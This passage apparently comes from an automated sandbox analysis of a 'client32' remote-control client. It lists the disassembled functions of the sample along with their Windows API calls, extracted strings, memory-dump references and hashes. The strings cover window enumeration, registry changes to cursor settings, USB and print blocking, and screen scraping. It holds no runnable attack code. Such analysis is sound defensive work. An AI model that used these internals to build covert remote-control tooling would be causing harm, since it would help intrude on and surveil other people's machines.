                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseFolderHandlePathWindow$ErrorExecFileLastMessageModuleNamePost_memset
                                                        • String ID: D$DoShowVideo - could not find %s window$Failed to load player (%d)$PCIVideoSlave32$ShowVideo$pcivideovi.exe /X
                                                        • API String ID: 2703108677-1914331637
                                                        • Opcode ID: 663dccee32d0e786faae837599a30831d1b500c9d939b8a56e5f3d5aea0eda79
                                                        • Instruction ID: e696fddc6ff2d01e6b9a77bd21ef717381eee885786c7b130f534b4739ca8f54
                                                        • Opcode Fuzzy Hash: 663dccee32d0e786faae837599a30831d1b500c9d939b8a56e5f3d5aea0eda79
                                                        • Instruction Fuzzy Hash: AA410579A002199FDB10DF64DC85FDDF7A8AF45708F5080E4E9099B284EF71AA448F95
                                                        Function 1102F5C0 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 245sleepwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,82E0FB89), ref: 1102F5FA
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • EnumWindows.USER32(Function_0002E710,00000001), ref: 1102F6D2
                                                        • EnumWindows.USER32(Function_0002E710,00000000), ref: 1102F72C
                                                        • Sleep.KERNEL32(00000014), ref: 1102F73C
                                                        • Sleep.KERNEL32(?), ref: 1102F773
                                                          • Part of subcall function 11026B80: _memset.LIBCMT ref: 11026BB5
                                                          • Part of subcall function 11026B80: wsprintfA.USER32 ref: 11026BEA
                                                          • Part of subcall function 11026B80: WaitForSingleObject.KERNEL32(?,000000FF), ref: 11026C2F
                                                          • Part of subcall function 11026B80: GetExitCodeProcess.KERNEL32(?,?), ref: 11026C43
                                                          • Part of subcall function 11026B80: CloseHandle.KERNEL32(?,?), ref: 11026C75
                                                          • Part of subcall function 11026B80: CloseHandle.KERNEL32(?), ref: 11026C7E
                                                        • Sleep.KERNEL32(0000000A), ref: 1102F78B
                                                        • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 1102F847
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: SleepWindows$CloseEnumHandle$CodeDirectoryExitMessageObjectProcessSendSingleWait__wcstoi64_memsetwsprintf
                                                        • String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
                                                        • API String ID: 3887438110-1852639040
                                                        • Opcode ID: 6e945e8ad443019e654b15b67e049bf7049c8843d49cb251ac38597ff630e1b7
                                                        • Instruction ID: fccb9083fa6e288bb695f73796274cd7590cfa02bb95d1b93bba247e7dcc7a00
                                                        • Opcode Fuzzy Hash: 6e945e8ad443019e654b15b67e049bf7049c8843d49cb251ac38597ff630e1b7
                                                        • Instruction Fuzzy Hash: 1791AC75E0022A9FDB54CF64CC80BEEF7A5AF49358F5441ADD9099B240EB70AE41CB92
                                                        Function 1104F2D8 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 235COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountTick_malloc_memsetwsprintf
                                                        • String ID: %s|%s$Channel$Client$Delay$NameLookup$_License$serial_no
                                                        • API String ID: 476529905-1572471466
                                                        • Opcode ID: ca7fc97896567c1f978747fa00b1f5c0e314cc63e1af649f67b0fbb7e76947d2
                                                        • Instruction ID: 20ddcee4d1bc7712217354b168d0bfd2dc4cde43965b802a14daddc5ad8be1dc
                                                        • Opcode Fuzzy Hash: ca7fc97896567c1f978747fa00b1f5c0e314cc63e1af649f67b0fbb7e76947d2
                                                        • Instruction Fuzzy Hash: 2C8148B5E002564FDB10CB78CC88BEEBBF5AF45318F1482E9D859D7281EA31E941CB91
                                                        Function 110993D0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 285timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 110C57C0: __strdup.LIBCMT ref: 110C57DA
                                                          • Part of subcall function 110C5870: _free.LIBCMT ref: 110C589D
                                                          • Part of subcall function 110C6420: wvsprintfA.USER32(?,?,?), ref: 110C644B
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • GetLocalTime.KERNEL32(?), ref: 110996E8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorExitLastLocalMessageProcessTime__strdup_freewsprintfwvsprintf
                                                        • String ID: %s\$%s\%s$%s_$CLASSID=$IsA()$LESSON=$[JNL] MakeFileName ret %s$\/:*?"<>|$_%04d_%02d_%02d_%02d%02d$_%s$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
                                                        • API String ID: 2014016395-1608741677
                                                        • Opcode ID: 6ca9aad45367f76a0944e11dc61ab406c9dd12e77d36c841446f91c23c45e7e4
                                                        • Instruction ID: addf530891e37868822e31691bf17d6718b8effada6f07c03448ee7c6713f98b
                                                        • Opcode Fuzzy Hash: 6ca9aad45367f76a0944e11dc61ab406c9dd12e77d36c841446f91c23c45e7e4
                                                        • Instruction Fuzzy Hash: C0B1AA79E0051AABDB25DB65CD50FEEF7B4AF58B08F4040D8E80963281EB317B44CEA5
                                                        Function 11109150 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 211registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _calloc.LIBCMT ref: 11109194
                                                        • _free.LIBCMT ref: 11109178
                                                          • Part of subcall function 11151665: HeapFree.KERNEL32(00000000,00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115167B
                                                          • Part of subcall function 11151665: GetLastError.KERNEL32(00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115168D
                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Cursors,00000000,0002001F,?,00000000,?,?), ref: 111091D7
                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 11109315
                                                        • _free.LIBCMT ref: 11109323
                                                        • SystemParametersInfoA.USER32(00000057,00000000,00000000,00000000), ref: 1110933F
                                                        • _malloc.LIBCMT ref: 1110937C
                                                          • Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
                                                          • Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
                                                          • Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616
                                                        • RegSetValueExA.ADVAPI32(?,?,00000000,?,11182200,00000001), ref: 111093B8
                                                        • RegSetValueExA.ADVAPI32(?,?,00000000,?,00000000,00000002,?,?,?,?,?,?), ref: 111093F2
                                                        • _free.LIBCMT ref: 11109403
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$HeapValue$AllocateCloseErrorFreeInfoLastOpenParametersSystem_calloc_malloc
                                                        • String ID: .ani$Control Panel\Cursors
                                                        • API String ID: 918258518-1319880064
                                                        • Opcode ID: c53165d656da7e753d8bb01dd9a1daddcdb0dc00f19b4d214db7b3aa82dc0232
                                                        • Instruction ID: 70085561973be509b33fca5fb73cb0cd02be037bb32c9e1d27dc1538c435e597
                                                        • Opcode Fuzzy Hash: c53165d656da7e753d8bb01dd9a1daddcdb0dc00f19b4d214db7b3aa82dc0232
                                                        • Instruction Fuzzy Hash: 0F8192B1E0026D9FDB25CF24CD95BD9F7B5AB09308F1045E9E90DAB280E7709A84CF91
                                                        Function 110AB110 Relevance: 21.2, APIs: 3, Strings: 9, Instructions: 206COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • EnterCriticalSection.KERNEL32(000000FF,View,limitcolorbits,00000000,00000000,82E0FB89,?,?,00000000), ref: 110AB17D
                                                        • UnionRect.USER32(?,?,?), ref: 110AB210
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 110AB36E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeaveRectUnion__wcstoi64
                                                        • String ID: $$Client$ScrapeBandwidth$ScrapeBandwidthPeriod$ScrapeBusyDelay$ScrapeNotBusyDelay$ScrapeSkipDelay$View$limitcolorbits
                                                        • API String ID: 3518726166-1273412197
                                                        • Opcode ID: e3c3c332c56030bb27a1236354f52011bf6cdcdea50863d5a731ae696520c0ea
                                                        • Instruction ID: a8670cac8e9aec6debf5f4417f5d7e546ceba16e81d257d7b5c14f0770091148
                                                        • Opcode Fuzzy Hash: e3c3c332c56030bb27a1236354f52011bf6cdcdea50863d5a731ae696520c0ea
                                                        • Instruction Fuzzy Hash: 08812774E016199FDB44CFA9D980BEDFBF5BB48304F10856AE915AB380DB30A941CF94
                                                        Function 1103D620 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 113windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000472), ref: 1103D64F
                                                          • Part of subcall function 1114E020: SetPropA.USER32(00000000,00000000,00000000), ref: 1114E03E
                                                          • Part of subcall function 1114E020: SetWindowLongA.USER32(00000000,000000FC,1114DA30), ref: 1114E04F
                                                        • wsprintfA.USER32 ref: 1103D6C9
                                                        • GetSystemMenu.USER32(?,00000000), ref: 1103D6EE
                                                        • EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103D6FC
                                                        • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000003), ref: 1103D740
                                                        • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1103D76F
                                                        • MessageBeep.USER32(00000000), ref: 1103D773
                                                          • Part of subcall function 11133F90: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11182A50), ref: 11133FFD
                                                          • Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110291B), ref: 1113403E
                                                          • Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113409B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$FolderItemMenuPath$BeepEnableFileLongMessageModuleNamePropSystemwsprintf
                                                        • String ID: %sblockapp.jpg$BlockedAppFile$Client$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 2765991881-2812993818
                                                        • Opcode ID: df56dbca2d5c7331c01273a47a7a69ca0b246c7bc76a6fcbc4a787e55cec9ec9
                                                        • Instruction ID: 894e21e3321225be45fbf4b84cce46d9dcc057afdefe44a7cc44894c2f8d1d99
                                                        • Opcode Fuzzy Hash: df56dbca2d5c7331c01273a47a7a69ca0b246c7bc76a6fcbc4a787e55cec9ec9
                                                        • Instruction Fuzzy Hash: 7241A275B40715AFD321DBA4CC86FCAF3A5AB48B08F108559F65A6B2C1DAB0B980CF54
                                                        Function 110392A0 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 352COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: @$DoRegisterUser$Error. Failed to get username for Register, e=%d$Info. No logged on user for Register$Login name %s$P$StudentRegister
                                                        • API String ID: 2102423945-4086722448
                                                        • Opcode ID: 22cbb9fb42798ebb7b2fd9b95911f0edbea0f32f4c9fa59db5531e7c095c1564
                                                        • Instruction ID: 1d57743a9d44351fe37c7a7ceb1e13dab01037a573cd7346b174f6f956a17580
                                                        • Opcode Fuzzy Hash: 22cbb9fb42798ebb7b2fd9b95911f0edbea0f32f4c9fa59db5531e7c095c1564
                                                        • Instruction Fuzzy Hash: 2EE19D759106169FDBA1DF64CC84BDEB7B8AF85308F0085ADE51E97281EB70AE84CF50
                                                        Function 1100D200 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wsprintf
                                                        • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                        • API String ID: 2111968516-2092292787
                                                        • Opcode ID: a62445a2f5b24e74ad1493caf88a761d0d6eb04853175cd6ce44690ba5ae0496
                                                        • Instruction ID: d579ba34fa4a490cdb183746ff6a6ffdefa25787e89df8885af00e6879baa994
                                                        • Opcode Fuzzy Hash: a62445a2f5b24e74ad1493caf88a761d0d6eb04853175cd6ce44690ba5ae0496
                                                        • Instruction Fuzzy Hash: 4AF06C32AA821857AD0086EDB44443CF38C678066D7CCD1D2F58CEAF21E912CDA0AA99
                                                        Function 1101D0B0 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 217timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnableWindow.USER32(00000000,?), ref: 1101D10E
                                                        • InvalidateRect.USER32(00000000,00000000,00000000), ref: 1101D148
                                                        • DeleteObject.GDI32(?), ref: 1101D193
                                                        • SetTimer.USER32(00000000,00000001,000002EE,00000000), ref: 1101D28C
                                                        • SetWindowTextA.USER32(00000000,00000000), ref: 1101D255
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$DeleteEnableErrorExitInvalidateLastMessageObjectProcessRectTextTimerwsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 2329730260-1557312927
                                                        • Opcode ID: 495e5cdad597b9cdb94b14c15a770d57a151504633e1c97aa44e3dbf2d83e9b8
                                                        • Instruction ID: c8a0ada2fc9048c31c9f756b7ea63b130b06c90983f76905bbf0c43349d37983
                                                        • Opcode Fuzzy Hash: 495e5cdad597b9cdb94b14c15a770d57a151504633e1c97aa44e3dbf2d83e9b8
                                                        • Instruction Fuzzy Hash: D8915BB9A00601AFD315DB55CC94FD6F3F6BF98318F1086A8EA5A4B285D770F881CB91
                                                        Function 1103B350 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 146COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1, xrefs: 1103B42B
                                                        • SETOPTICALDRIVEACCESS, xrefs: 1103B3E4
                                                        • IsA(), xrefs: 1103B454
                                                        • SETOPTICALDRIVEACCESSACCESSMODES=%u, xrefs: 1103B3FF
                                                        • BLOCKPRINTING, xrefs: 1103B40D
                                                        • SETUSBMASSSTORAGEACCESS, xrefs: 1103B3B3
                                                        • RESUMEPRINTINGPRINTER=*FILETYPES=, xrefs: 1103B432
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 1103B44F
                                                        • SETUSBMASSSTORAGEACCESSACCESSMODES=%u, xrefs: 1103B3D6
